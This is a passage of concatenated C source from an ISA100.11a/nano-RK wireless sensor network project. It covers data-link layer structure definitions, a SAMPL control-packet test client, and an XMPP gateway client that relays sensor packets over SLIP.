int8_t length;
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
bool transmitPending;
bool usedSlot;
void (*slot_callback)(ISA_QUEUE *, status);
uint8_t priority;
uint16_t neighbor;
nrk_time_t time;
uint8_t numTries;
} ;
//************************************dlmo.neighbor structure***************************************
//for typeInfo
# define CLOCK_NONE 0x00
# define CLOCK_SECONDARY 0x40
# define CLOCK_PREFERRED 0x80
# define CLOCK_RESERVED 0xC0
typedef struct {
bool isPresent;
uint16_t index;
uint64_t EUI64;
uint8_t groupCode1;
uint8_t groupCode2;
uint8_t typeInfo;// 7-6 ClockSource, 5-4 ExtGrCnt, DiagLevel 3-2, LinkBacklog 1,Reserved 0
uint8_t linkBacklogIndex;//
uint8_t linkBacklogDur;//
uint8_t linkBacklogActivate;
}DLMO_NEIGHBOR;
//MACROS for bit manipulation
#define BITSET(x,y) ((x) |= 1<<(y))
#define BITCLEAR(x,y) ((x) &= ~(1<<(y)))
#define BITGET(x,y) ((x) & 1<<(y))
#define ISAMASK(x,y) ((x) & (y))
#define ISASET(x,y) ((x) | (y))
#define SHIFTRIGHT(x,y) ((x)>>(y))
#define SHIFTLEFT(x,y) ((x)<<(y))
/*************************************dlmo.Graph***************************************/
#define GRAPH_TYPE_MASK 0x30
#define GRAPH_TYPE_BIT 4
#define NEIGHBOR_COUNT_LOWER_BIT 4
#define NEIGHBOR_COUNT_MASK 0x70
typedef struct{
uint16_t index;
/*
* dlmo.Graph[].PreferredBranch. If this indicator is 1, treat the first listed neighbor as the
preferred branch, and the DL should wait until there is an opportunity to try at least one
transmission along the preferred branch before attempting other alternatives. If this
indicator is 0, do not give such preferential treatment to the first listed neighbor.
• dlmo.Queue allows the system manager to reserve up to 15 buffers of the message queue
for DPDUs that are following the graph.
*
*/
uint8_t info; // Preferred branch (1)NeighborCount(3)Queue(4)
/*
* dlmo.Graph[].MaxLifetime (units 1⁄4 s). If this element is non-zero, the value of
dlmo.MaxLifetime shall be overridden for all DPDUs being forwarded following this graph.
*
*/
uint8_t maxLifeTime;
/*
* List of neighbors (commonly two neighbors for next-hop link diversity).
*/
uint16_t neighbor[3];
}DLMO_GRAPH;
// ********************************* dlmo.link structure *******************************
//For graphType subfield
typedef enum{
NEIGHBOR,
GRAPH,
GRAPH_NEIGHBOR
}GraphType;
typedef struct {
bool isPresent;
uint16_t index;
/*
* dlmo.SuperframeIndex. Indicates the superframe reference for the link.
*
*/
uint8_t superframeIndex;
/*
* Indicates how the link is configured for transmission and/or reception,
* and/or neighbor discovery. See Table 182.
*
*/
uint8_t linkType;
/*
* dlmo.Link[].Template1. Primary timeslot template. See 9.4.3.3 for a discussion of
* templates.
*
*/
uint8_t template1;
/*
* dlmo.Link[].Template2. Secondary timeslot template, for transmit/receive (TR) slots only,
in combination with other link selections. Use Template2 as the receive template, if there
is no DPDU in the queue for the primary template. Template 2 is transmitted and
meaningful only for TRx links, that is, links where Link[].Type bits 6 and 7 both have a
value of 1.
*
*/
uint8_t template2;
uint8_t typeInfo; //Neighbor Type(7,6) |Graph Type (5,4) | Sched Type (3,2) | ChType(1) | Priority Type(0)
/*
* A neighbor is designated for transmit
* links. See 9.4.3.4 for a discussion of neighbors. When a neighbor is designated in a link, it
* may reference either a dlmo.Neighbor index or a group
*
*/
DLMO_NEIGHBOR *neighbor; //pointer to the neighbor that this link is configured for
/*
* DPDUs following a particular graph may be
given exclusive or priority access to certain transmit links. These fields, when so
configured, limit link access to certain graphs, thereby connecting the link to a particular
communication flow through the DL subnet. When GraphType is left blank, the transmit
link is available to any DPDU that is being routed through the link’s designated neighbor.
When GraphType is used, a particular graph is given exclusive or priority access to the
link.
*
*/
DLMO_GRAPH* graphPtr; //pointer to the graph that is configured for this link
/*
* dlmo.Link[].SchedType, dlmo.Link[].Schedule. Indicates the timeslot position(s) of the link
within each superframe cycle. The schedule may designate a fixed offset, a fixed set of
intervals, a range, or a bitmap.
• 0=Offset only
• 1=Offset and interval
• 2=Range
• 3=Bitmap
*
*/
uint32_t schedule;
/*
* Indicates how the link’s channel is selected
*
*/
uint8_t chOffset;
/*
* Indicates how the links priority is set. Link
priorities are functionally described in 9.1.8.5.
*
*/
uint8_t priority;
} DLMO_LINK;
// *******************************Alert report Descriptor **************************
typedef struct {
bool alertReportDisabled;
uint8_t alertReportPriority;
}ALERT_REPORT;
/*
*
Descriptor
Type: Alert Report Descriptor (Table 257)
Default: Disabled=False
Default: Priority=0
Duration
Type: Unsigned16
Units: 1 s
Default: 60
*
*
*/
typedef struct {
ALERT_REPORT alertReport;
uint16_t duration;
}DLMO_DISCOVERY_ALERT;
//************************************ dlmo.Candidate***********************************
typedef struct {
/*
* dlmo.Candidates.Neighbor N is the 16-bit address of each candidate neighbor in the DL
* subnet.
*/
uint16_t neighbor;
/*
* dlmo.RSSI N indicates the strength of the radio signal from each candidate neighbor,
* based on received advertisements and possibly other DPDUs. See 9.1.15.2 for description
* of RSSI.
*
*/
uint8_t rssi;
/*
* dlmo.RSQI N indicates the quality of the radio signal from each candidate neighbor, based
* on received advertisements and possibly other considerations. A higher number indicates
* a better radio signal. See 9.1.15.2. for description of RSQI. If the chipset does not support
* RSQI, i.e.
*/
uint8_t rsqi;
}CANDIDATE;
typedef struct {
uint8_t n; //represents the number of neighbors that have been discovered
CANDIDATE candidate[DLMO_CANDIDATE_MAX_SIZE]; //candidate information
}DLMO_CANDIDATE;
//************************************ extern variables ***********************************
extern uint8_t isa_clk_src_id;
//************************************extern functions**************************************
extern void configureSlot(uint8_t slotNumber, uint16_t neighborId, LinkType linkType, bool clockSource, uint16_t graphId, uint8_t neighborCount, uint16_t n1, uint16_t n2, uint16_t n3, uint8_t graphType);
extern void dlmoInit();
extern DLMO_GRAPH* addGraph(uint16_t graphId, uint8_t neighborCount, uint16_t n1, uint16_t n2, uint16_t n3);
extern int8_t addLink(uint8_t slotNumber, uint16_t neighborId,uint16_t graphId , LinkType linkType, GraphType graphType);
extern DLMO_NEIGHBOR* addNeighbor(uint16_t index,uint64_t EUI64, uint8_t groupCode1, uint8_t groupCode2, bool clockSource,uint8_t linkBacklogIndex,uint8_t linkBacklogDur, uint8_t linkBacklogActivate);
extern void dd_data_indication(uint16_t srcAddr,uint16_t destAddr,uint8_t priority,bool discardEligibile, bool lh, uint8_t length, uint8_t *payload);
extern void sendPacket(uint16_t destAddr,uint8_t graphId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry, status)) ;
extern DLMO_LINK * findLink(uint8_t slot);
extern bool isTransmitLinkPresent (uint8_t *payloadr);
extern void isaFreePacket(ISA_QUEUE *entry);
extern void clearCandidateTable();
extern int8_t addCandidate(uint16_t candidate);
extern bool isDiscoveryAlertDue();
extern void updateLastSentTime();
extern int8_t sendAdv ();
extern void flushCandidateEntries();
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/projects/SAMPL/slip-clients/tests/control-pkt/.svn/text-base/main.c.svn-base
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sampl.h>
#include <slipstream.h>
#include <ack_pkt.h>
#include <ff_basic_sensor_pkt.h>
//#include "tree_route.h"
//#include "slipstream.h"
#define gw_mac 0
uint8_t debug_txt_flag;
#define NONBLOCKING 0
#define BLOCKING 1
#define HEX_STR_SIZE 5
void handle_incomming_pkt(uint8_t *rx_buf,uint8_t len);
void error(char *msg);
void print_ds_packet(SAMPL_DOWNSTREAM_PKT_T *ds_pkt );
void print_gw_packet(SAMPL_GATEWAY_PKT_T *gw_pkt );
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent *server;
int size;
char buffer[2048];
SAMPL_DOWNSTREAM_PKT_T ds_pkt;
int main (int argc, char *argv[])
{
FILE *fp;
uint8_t tx_buf[128];
uint8_t rx_buf[128];
int32_t v,cnt,i,len;
uint8_t nav_time_secs, reply_time_secs,checksum;
int32_t tmp;
time_t reply_timeout,nav_timeout,t;
uint8_t cmd,error;
char buf[1024];
debug_txt_flag=0;
if (argc < 3 || argc > 4) {
printf ("Usage: server port [-d]\n");
printf (" d Debug Output\n");
exit (1);
}
if(argc==4)
{
// Grab dash command line options
if(strstr(argv[3],"d")!=NULL )
{
debug_txt_flag=1;
}
}
v=slipstream_open(argv[1],atoi(argv[2]),NONBLOCKING);
nav_time_secs=25;
cnt = 0;
while (1) {
error=0;
cmd=0;
// Setup the packet to send out to the network
// These values setup the internal data structure and probably don't
// need to be changed
ds_pkt.payload_len=0;
ds_pkt.buf=tx_buf;
ds_pkt.buf_len=DS_PAYLOAD_START;
ds_pkt.payload_start=DS_PAYLOAD_START;
ds_pkt.payload=&(tx_buf[DS_PAYLOAD_START]);
// These are parameters that can be adjusted for different packets
ds_pkt.pkt_type=CONTROL_PKT;
ds_pkt.ctrl_flags= DS_MASK | LINK_ACK | DEBUG_FLAG;
ds_pkt.seq_num=cnt;
ds_pkt.priority=0;
ds_pkt.ack_retry=10;
ds_pkt.subnet_mac[0]=0;
ds_pkt.subnet_mac[1]=0;
ds_pkt.subnet_mac[2]=0;
ds_pkt.hop_cnt=0; // Starting depth, always keep at 0
ds_pkt.hop_max=5; // Max tree depth
ds_pkt.delay_per_level=1; // Reply delay per level in seconds
ds_pkt.nav=30; // Time in seconds until next message to be sent
ds_pkt.mac_check_rate=100; // B-mac check rate in ms
ds_pkt.rssi_threshold=-40; // Reply RSSI threshold
ds_pkt.last_hop_mac=0;
ds_pkt.mac_filter_num=0; // Increase if MAC_FILTER is active
ds_pkt.aes_ctr[0]=0; // Encryption AES counter
ds_pkt.aes_ctr[1]=0;
ds_pkt.aes_ctr[2]=0;
ds_pkt.aes_ctr[3]=0;
ds_pkt.payload[0]=(-40);
ds_pkt.payload[1]=0x01;
ds_pkt.payload[2]=0;
ds_pkt.payload[3]=60;
ds_pkt.payload[4]=0;
ds_pkt.payload[5]=60;
checksum=0;
for(i=0; i<6; i++ )
checksum+=ds_pkt.payload[i];
ds_pkt.payload[6]=checksum;
ds_pkt.payload_len=7;
// This takes the structure and packs it into the raw
// array that is sent using SLIP
pack_downstream_packet( &ds_pkt);
// Add MAC filter entries below
// downstream_packet_add_mac_filter( &ds_pkt, 2 );
// downstream_packet_add_mac_filter( &ds_pkt, 3 );
// downstream_packet_add_mac_filter( &ds_pkt, 4 );
// downstream_packet_add_mac_filter( &ds_pkt, 5 );
// Print your packet on the screen
if(debug_txt_flag==1)
print_ds_packet(&ds_pkt );
cnt++;
if(error==0)
v=slipstream_send(ds_pkt.buf,ds_pkt.buf_len);
if(debug_txt_flag==1)
{
if (v == 0) printf( "Error sending\n" );
else printf( "Sent request %d\n",ds_pkt.seq_num);
}
nav_time_secs=ds_pkt.nav;
reply_time_secs=ds_pkt.delay_per_level * ds_pkt.hop_max;
t=time(NULL);
reply_timeout=t+reply_time_secs+1;
nav_timeout=t+nav_time_secs;
// Collect Reply packets
while(reply_timeout>time(NULL))
{
v=slipstream_receive( rx_buf);
if (v > 0) {
handle_incomming_pkt(rx_buf,v);
}
usleep(1000);
}
// What for NAV and service incoming messages
// This is the time window when the network is idle and can
// be used for asynchronous communications.
while(nav_timeout>time(NULL))
{
v=slipstream_receive( rx_buf);
if (v > 0) {
// Check for mobile/p2p packets
handle_incomming_pkt(rx_buf,v);
}
usleep(1000);
}
}
}
void handle_incomming_pkt(uint8_t *rx_buf,uint8_t len)
{
int i;
SAMPL_GATEWAY_PKT_T gw_pkt;
FF_SENSOR_SHORT_PKT_T sensor_short;
ACK_PKT_T ack;
printf( "Raw Pkt [%d] = ",len );
for(i=0; i<len; i++ ) printf( "%d ",rx_buf[i] );
printf( "\n" );
gw_pkt.buf=rx_buf;
gw_pkt.buf_len=len;
unpack_gateway_packet(&gw_pkt );
// You will have a gateway packet here to operate on.
// The gateway packet has a payload which contains user defined packets.
// Lets print the raw packet:
print_gw_packet(&gw_pkt);
// Now lets parse out some application data:
switch(gw_pkt.pkt_type)
{
// PING and ACK are the same
case PING_PKT:
case ACK_PKT:
for(i=0; i<gw_pkt.num_msgs; i++ )
{
ack_pkt_get( &ack, gw_pkt.payload, i);
printf( "Ack pkt from 0x%x\n",ack.mac_addr );
}
break;
// Default FireFly sensor packet
case FF_SENSOR_SHORT_PKT:
for(i=0; i<gw_pkt.num_msgs; i++ )
{
sensor_short_pkt_get( &sensor_short, gw_pkt.payload, i);
printf( "Sensor pkt from 0x%x",sensor_short.mac_addr );
printf( " Light: %d",sensor_short.light);
printf( " Temperature: %d",sensor_short.temperature);
printf( " Acceleration: %d",sensor_short.acceleration);
printf( " Sound Level: %d",sensor_short.sound_level);
printf( " Battery: %d",sensor_short.battery+100);
}
break;
}
}
void print_ds_packet(SAMPL_DOWNSTREAM_PKT_T *ds_pkt )
{
int i;
printf( "Downstream Packet Header info:\n" );
printf( " pkt type\t\t0x%x\n",ds_pkt->pkt_type);
printf( " ctrl flags\t\t0x%x\n",ds_pkt->ctrl_flags );
printf( " seq num\t\t0x%x\n",ds_pkt->seq_num );
printf( " priority\t\t0x%x\n",ds_pkt->priority);
printf( " ack retry\t\t0x%x\n",ds_pkt->ack_retry);
printf( " subnet mac\t\t0x%x\n",ds_pkt->subnet_mac[0]);
printf( " hop_cnt\t\t0x%x\n",ds_pkt->hop_cnt);
printf( " hop_max\t\t0x%x\n",ds_pkt->hop_max);
printf( " delay_per_level\t%d seconds\n",ds_pkt->delay_per_level);
printf( " nav\t\t\t%d seconds\n",ds_pkt->nav);
printf( " mac_check_rate\t%d ms\n",ds_pkt->mac_check_rate);
printf( " rssi_threshold\t%d\n",(int8_t)ds_pkt->rssi_threshold);
printf( " last_hop_mac\t\t0x%x\n",ds_pkt->last_hop_mac);
printf( " mac_filter_num\t0x%x\n",ds_pkt->mac_filter_num);
printf( " aes_ctr\t\t0x%x 0x%x 0x%x 0x%x\n",ds_pkt->aes_ctr[3], ds_pkt->aes_ctr[3],
ds_pkt->aes_ctr[2], ds_pkt->aes_ctr[1], ds_pkt->aes_ctr[0]);
printf( "Mac Filter List: " );
for(i=0; i<ds_pkt->mac_filter_num; i++ )
printf( "0x%x ",ds_pkt->buf[DS_PAYLOAD_START+i] );
printf( "\n\n" );
printf( "Payload Data: " );
for(i=0; i<ds_pkt->payload_len; i++ )
printf( "0x%x ",ds_pkt->payload[i] );
printf( "\n\n" );
}
void print_gw_packet(SAMPL_GATEWAY_PKT_T *gw_pkt )
{
int i;
printf( "Gateway Packet Header info:\n" );
printf( " pkt type\t\t0x%x\n",gw_pkt->pkt_type);
printf( " ctrl flags\t\t0x%x\n",gw_pkt->ctrl_flags );
printf( " seq num\t\t0x%x\n",gw_pkt->seq_num );
printf( " priority\t\t0x%x\n",gw_pkt->priority);
printf( " ack retry\t\t0x%x\n",gw_pkt->ack_retry);
printf( " subnet mac\t\t0x%x\n",gw_pkt->subnet_mac[0]);
printf( " src mac\t\t0x%x\n",gw_pkt->src_mac);
printf( " dst mac\t\t0x%x\n",gw_pkt->dst_mac);
printf( " last hop mac\t\t0x%x\n",gw_pkt->last_hop_mac);
printf( " rssi\t\t0x%x\n",gw_pkt->rssi);
printf( "Payload Data: " );
for(i=0; i<gw_pkt->payload_len; i++ )
printf( "0x%x ",gw_pkt->payload[i] );
printf( "\n\n" );
}
void error(char *msg)
{
perror(msg);
exit(0);
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/SAMPL/slip-clients/xmpp-client/main.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include "../../include/sampl.h"
#include <slipstream.h>
#include <lm-library.h>
#include "node_list.h"
#include "globals.h"
#include "xmpp_pkt_writer.h"
#include "sensor_cal.h"
#include <loudmouth/loudmouth.h>
#define SEQ_CACHE_SIZE 24
#define IGNORE_PACKET 0
#define US_PACKET 1
#define P2P_PACKET 2
uint8_t gw_subnet_2;
uint8_t gw_subnet_1;
uint8_t gw_subnet_0;
uint8_t gw_mac;
#define NONBLOCKING 0
#define BLOCKING 1
#define HEX_STR_SIZE 5
static void handle_xmpp_msgs ( LmMessage *m);
void handle_incomming_pkt(uint8_t *rx_buf,uint8_t len);
void error(char *msg);
void print_ds_packet(SAMPL_DOWNSTREAM_PKT_T *ds_pkt );
void check_and_create_node(char *node_name);
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent *server;
int size,error_debug_txt_flag=1;
char buffer[2048];
void seq_num_cache_init();
int seq_num_cache_check( uint8_t *mac_addr, uint8_t seq_num, uint8_t pkt_type);
typedef struct seq_num_cache {
uint8_t addr[4];
uint8_t seq_num;
uint8_t pkt_type;
int valid;
} seq_num_cache_t;
seq_num_cache_t seq_cache[SEQ_CACHE_SIZE];
SAMPL_DOWNSTREAM_PKT_T ds_pkt;
char slip_server[MAX_BUF];
uint32_t slip_port;
FILE *fp;
char buf[1024];
static void handle_xmpp_msgs ( LmMessage *m )
{
printf( "XMPP message handler\n" );
}
void *main_publish_loop(gpointer data)
{
uint8_t tx_buf[MAX_BUF];
uint8_t rx_buf[MAX_BUF];
int32_t v,i,len;
uint8_t seq_num;
uint8_t nav_time_secs;
uint8_t reply_time_secs;
int32_t tmp;
time_t reply_timeout, nav_timeout,t;
uint8_t cmd_ready,error,ret;
char token[64];
char name[64];
printf( "Adding gateway node\n" );
if(xmpp_flag==1)
{
//sscanf(username,"%[^@]",name);
sprintf( name, "%02x%02x%02x%02x",gw_subnet_2, gw_subnet_1, gw_subnet_0, gw_mac );
node_list_add(name);
}
if(xmpp_flag==1)
{
// generate parent node for gateway
ret = create_event_node(connection, name,NULL,FALSE);
if(ret != XMPP_NO_ERROR) {
if(ret == XMPP_ERROR_NODE_EXISTS)
if(debug_txt_flag) printf("Node '%s' already exists\n",name);
else {
g_printerr("Could not create event node '%s'. Error='%s'\n",name,ERROR_MESSAGE(ret));
return -1;
}
} else if(debug_txt_flag) printf("Created event node '%s'\n",name);
}
v=slipstream_open(slip_server,slip_port,NONBLOCKING);
//v=slipstream_open(argv[1],atoi(argv[2]),NONBLOCKING);
seq_num = 0;
while (1) {
error=0;
cmd_ready=0;
// Read Data packet from script file
while(cmd_ready==0)
{
v=fscanf( fp, "%[^\n]\n", buf);
if(v==-1) rewind(fp);
if(buf[0]!='#' && v!=-1)
{
uint8_t offset;
offset=0;
i=0;
tmp=1;
if(error_debug_txt_flag==1) printf( "108: Parsing line\n" );
while(tmp==1) {
tmp=sscanf( &buf[offset*HEX_STR_SIZE],"0x%x ",&tx_buf[i] );
// printf( "i=%d tmp=%d val=0x%x\n",i,tmp,tx_buf[i] );
if(tmp==1) { offset++; i++; }
}
if(error_debug_txt_flag==1) printf( "116: Parsing line done\n" );
len=offset;
ds_pkt.buf_len=offset;
ds_pkt.buf=tx_buf;
// write to the structure and raw buffer
// We end up transmitting the raw buffer after adding the correct sequence number
// also load the correct subnet mac from the command line input
tx_buf[SUBNET_MAC_2]=gw_subnet_2;
tx_buf[SUBNET_MAC_1]=gw_subnet_1;
tx_buf[SUBNET_MAC_0]=gw_subnet_0;
tx_buf[DS_LAST_HOP_MAC]=gw_mac;
tx_buf[SEQ_NUM]=seq_num;
tx_buf[DS_AES_CTR_0]=seq_num;
if(tx_buf[DS_AES_CTR_0]==255) tx_buf[DS_AES_CTR_1]++;
if(tx_buf[DS_AES_CTR_1]==255) tx_buf[DS_AES_CTR_2]++;
if(tx_buf[DS_AES_CTR_2]==255) tx_buf[DS_AES_CTR_3]++;
if(error_debug_txt_flag==1) printf( "128: About to unpack gw pkt\n" );
unpack_downstream_packet( &ds_pkt, 0 );
if(error_debug_txt_flag==1) printf( "130: gw pkt unpacked\n" );
if(debug_txt_flag==1)
print_ds_packet(&ds_pkt );
if(i<21 )
{
error=1;
printf( "Error parsing input file!\n" );
}
seq_num++;
nav_time_secs=tx_buf[DS_NAV];
reply_time_secs=tx_buf[DS_DELAY_PER_LEVEL] * tx_buf[DS_HOP_MAX];
cmd_ready=1;
}
}
if(error_debug_txt_flag==1) printf( "149: Done parsing file\n" );
// Send the packet
if(len>128) len=128;
if(!no_slip_flag && error==0)
v=slipstream_send(tx_buf,len);
if(error_debug_txt_flag==1) printf( "154: Slipstream sent\n" );
if(debug_txt_flag==1)
{
if (v == 0) printf( "Error sending\n" );
else printf( "Sent request %d\n",tx_buf[SEQ_NUM]);
}
t=time(NULL);
reply_timeout=t+reply_time_secs+1;
nav_timeout=t+nav_time_secs;
if(error_debug_txt_flag==1) printf( "165: Waiting for reply\n" );
// Collect Reply packets
while(reply_timeout>time(NULL))
{
v=slipstream_receive( rx_buf);
if (v > 0) {
if(error_debug_txt_flag==1) printf( "171: before in pkt: v= %d\n",v );
handle_incomming_pkt(rx_buf,v);
if(error_debug_txt_flag==1) printf( "173: after in pkt\n" );
}
usleep(1000);
}
if(debug_txt_flag==1) printf( "reply wait timeout...\n" );
// What for NAV and service incomming messages
// This is the time window when the network is idle and can
// be used for asynchronous communications.
while(nav_timeout>time(NULL))
{
v=slipstream_receive( rx_buf);
if (v > 0) {
if(error_debug_txt_flag==1) printf( "186: before in pkt: v= %d\n",v );
handle_incomming_pkt(rx_buf,v);
if(error_debug_txt_flag==1) printf( "188: after in pkt\n" );
// Check if TX queue has data and send the request
}
usleep(1000);
}
if(error_debug_txt_flag==1) printf( "194: Done with rx/tx cycle\n" );
}
}
int main (int argc, char *argv[])
{
GThread *main_thread = NULL;
GError *error = NULL;
GMainLoop *main_loop = NULL;
uint32_t gw_mac_addr_full;
char name[64];
char xmpp_file_name[128];
char sampl_file_name[128];
char password[64];
char xmpp_server[64];
char xmpp_ssl_fingerprint[64];
char pubsub_server[64];
char username[64];
uint32_t xmpp_server_port;
uint8_t param;
int32_t v,ret;
debug_txt_flag=0;
xmpp_flag=0;
no_slip_flag=0;
print_input_flag=0;
connection=NULL;
if (argc < 4 || argc > 7) {
printf ("Usage: server port gateway_mac [-vxnf] [xmmp_config_name] [sampl_config_name]\n");
printf (" gateway_mac e.g. 0x00000000\n");
printf (" v Print Verbose Debug\n");
printf (" x Send data to XMPP server\n");
printf (" n Don't send SLIP packets (but receive them)\n");
printf (" f Use the following config files instead of the defaults\n");
exit (1);
}
sscanf( argv[3],"%x",&gw_mac_addr_full );
printf( "GW mac: 0x%08x\n",gw_mac_addr_full );
gw_subnet_2=gw_mac_addr_full>>24;
gw_subnet_1=gw_mac_addr_full>>16;
gw_subnet_0=gw_mac_addr_full>>8;
gw_mac=gw_mac_addr_full&0xff;
strcpy( xmpp_file_name, "xmpp_config.txt" );
strcpy( sampl_file_name, "ff_config.txt" );
if(argc>3)
{
// Grab dash command line options
if(strstr(argv[4],"v")!=NULL )
{
printf( "Verbose Mode ON\n" );
debug_txt_flag=1;
}
if(strstr(argv[4],"x")!=NULL )
{
printf( "XMPP ON\n" );
xmpp_flag=1;
}
if(strstr(argv[4],"n")!=NULL )
{
printf( "SLIP TX OFF\n" );
no_slip_flag=1;
}
if(strstr(argv[4],"f")!=NULL )
{
printf( "Loading XMPP config: " );
strcpy(xmpp_file_name, argv[5]);
printf( "%s\n",xmpp_file_name );
printf( "Loading SAMPL config: " );
strcpy(sampl_file_name, argv[6]);
printf( "%s\n",sampl_file_name );
}
}
if(xmpp_flag)
{
fp=fopen( xmpp_file_name,"r" );
if(fp==NULL)
{
printf( "XMPP config: No %s file!\n",xmpp_file_name );
exit(0);
}
param=0;
do {
v=fscanf( fp, "%[^\n]\n", buf);
if(buf[0]!='#' && v!=-1)
{
switch(param)
{
case 0: strcpy(username,buf); break;
case 1: strcpy(password,buf); break;
case 2: strcpy(xmpp_server,buf); break;
case 3: xmpp_server_port=atoi(buf); break;
case 4: strcpy(pubsub_server,buf); break;
case 5: strcpy(xmpp_ssl_fingerprint,buf); break;
}
param++;
}
}while(v!=-1 && param<6 );
if(debug_txt_flag)
{
printf( "XMPP Client Configuration:\n" );
printf( " username: %s\n",username );
printf( " password: %s\n",<PASSWORD>);
printf( " xmpp server: %s\n",xmpp_server);
printf( " xmpp server port: %d\n",xmpp_server_port);
printf( " xmpp pubsub server: %s\n",pubsub_server);
printf( " xmpp ssl fingerprint: %s\n\n",xmpp_ssl_fingerprint);
}
if(param<4)
{
printf( "Not enough xmpp configuration parameters in xmpp_config.txt\n" );
exit(0);
}
connection = start_xmpp_client(username,
password,
xmpp_server,
xmpp_server_port,
xmpp_ssl_fingerprint,
pubsub_server,
handle_xmpp_msgs );
if(connection == NULL) {
g_printerr("Could not start client.\n");
return -1;
}
fclose(fp);
if(debug_txt_flag) printf("Initialized XMPP client\n");
}
fp=fopen( sampl_file_name,"r" );
if(fp==NULL) {
printf( "SAMPL config: No %s file!\n",sampl_file_name );
printf( "This is required for sending control commands\n" );
exit(0);
}
// clear list of nodes
node_list_init();
seq_num_cache_init();
cal_load_params("sensor_cal.txt");
strcpy(slip_server,argv[1]);
slip_port=atoi(argv[2]);
g_thread_init (NULL);
main_loop = g_main_loop_new(NULL,FALSE);
main_thread =
g_thread_create ((GThreadFunc) main_publish_loop, connection, TRUE, &error);
if (error != NULL) {
g_printerr ("Thread creation error: <%s>\n", error->message);
return -1;
}
g_print("created thread\n");
g_main_loop_run (main_loop);
}
void handle_incomming_pkt(uint8_t *rx_buf,uint8_t len)
{
int i,ret;
int pkt_type;
uint8_t mac[4];
char node_name[MAX_NODE_LEN];
SAMPL_GATEWAY_PKT_T gw_pkt;
SAMPL_PEER_2_PEER_PKT_T p2p_pkt;
if(debug_txt_flag==1)
{
printf( "Incomming Pkt [%d] = ",len );
for(i=0; i<len; i++ ) printf( "%d ",rx_buf[i] );
printf( "\n" );
}
pkt_type=IGNORE_PACKET;
if((rx_buf[CTRL_FLAGS] & US_MASK) != 0 && ((rx_buf[CTRL_FLAGS] & DS_MASK) !=0 ))
pkt_type=P2P_PACKET;
else if ((rx_buf[CTRL_FLAGS] & US_MASK) != 0 && (rx_buf[CTRL_FLAGS] & DS_MASK) == 0)
pkt_type=US_PACKET;
else pkt_type=IGNORE_PACKET;
mac[3]=rx_buf[SUBNET_MAC_2];
mac[2]=rx_buf[SUBNET_MAC_1];
mac[1]=rx_buf[SUBNET_MAC_0];
mac[0]=rx_buf[GW_SRC_MAC];
printf("checking: %02x%02x%02x%02x\n",mac[3],
mac[2],
mac[1],
mac[0] );
// Check if it is a repeat packet
if( seq_num_cache_check( mac , rx_buf[SEQ_NUM],rx_buf[PKT_TYPE])==1)
{
if(debug_txt_flag==1) printf( "DUPLICATE PACKET!\n" );
sprintf(node_name,"%02x%02x%02x%02x",rx_buf[SUBNET_MAC_2],
rx_buf[SUBNET_MAC_1],
rx_buf[SUBNET_MAC_0],
rx_buf[GW_SRC_MAC] );
printf( "mac=%s seq_num=%d type=%d\n",node_name, rx_buf[SEQ_NUM],rx_buf[PKT_TYPE]);
} else
{
// Create an event node if it doesn't already exist and if it is an infrastructure node
if(xmpp_flag==1)
{
if(pkt_type!=IGNORE_PACKET && (rx_buf[CTRL_FLAGS] & MOBILE_MASK) !=0)
{
sprintf(node_name,"%02x%02x%02x%02x",rx_buf[SUBNET_MAC_2],
rx_buf[SUBNET_MAC_1],
rx_buf[SUBNET_MAC_0],
rx_buf[GW_LAST_HOP_MAC] );
check_and_create_node(node_name);
}
}
// The only p2p packet that we understand from a mobile node is the XMPP_MSG
if(pkt_type==P2P_PACKET &&
(rx_buf[CTRL_FLAGS] & MOBILE_MASK) !=0 &&
rx_buf[PKT_TYPE]!=XMPP_PKT ) pkt_type=IGNORE_PACKET;
gw_pkt.buf=rx_buf;
gw_pkt.buf_len=len;
unpack_gateway_packet(&gw_pkt );
if(debug_txt_flag==1) printf( "Calling pkt handler for pkt_type %d\n",gw_pkt.pkt_type );
switch(gw_pkt.pkt_type)
{
case PING_PKT:
case ACK_PKT:
send_xmpp_ping_pkt( &gw_pkt );
if(debug_txt_flag==1) printf( "PING or ACK packet\n" );
break;
case XMPP_PKT:
xmpp_pkt_handler( &gw_pkt );
if(debug_txt_flag==1) printf( "XMPP packet\n" );
break;
case EXTENDED_NEIGHBOR_LIST_PKT:
extended_nlist_pkt_handler( &gw_pkt );
if(debug_txt_flag==1) printf( "Extended Neighbor List packet\n" );
break;
case FF_SENSOR_SHORT_PKT:
send_xmpp_sensor_short_pkt( &gw_pkt );
if(debug_txt_flag==1) printf( "SENSOR_SHORT packet\n" );
break;
case TRACEROUTE_PKT:
if(debug_txt_flag==1) printf( "TRACEROUTE packet\n" );
break;
default:
if(debug_txt_flag==1) printf( "Unknown Packet\n" );
}
}
printf( "done with handle pkt\n" );
}
void error(char *msg)
{
perror(msg);
exit(0);
}
void print_ds_packet(SAMPL_DOWNSTREAM_PKT_T *ds_pkt )
{
int i;
printf( "Downstream Packet Header info:\n" );
printf( " pkt type\t\t0x%x\n",ds_pkt->pkt_type);
printf( " ctrl flags\t\t0x%x\n",ds_pkt->ctrl_flags );
printf( " seq num\t\t0x%x\n",ds_pkt->seq_num );
printf( " priority\t\t0x%x\n",ds_pkt->priority);
printf( " ack retry\t\t0x%x\n",ds_pkt->ack_retry);
printf( " subnet mac\t\t0x%x\n",ds_pkt->subnet_mac[0]);
printf( " hop_cnt\t\t0x%x\n",ds_pkt->hop_cnt);
printf( " hop_max\t\t0x%x\n",ds_pkt->hop_max);
printf( " delay_per_level\t%d seconds\n",ds_pkt->delay_per_level);
printf( " nav\t\t\t%d seconds\n",ds_pkt->nav);
printf( " mac_check_rate\t%d ms\n",ds_pkt->mac_check_rate);
printf( " rssi_threshold\t%d\n",(int8_t)(ds_pkt->rssi_threshold));
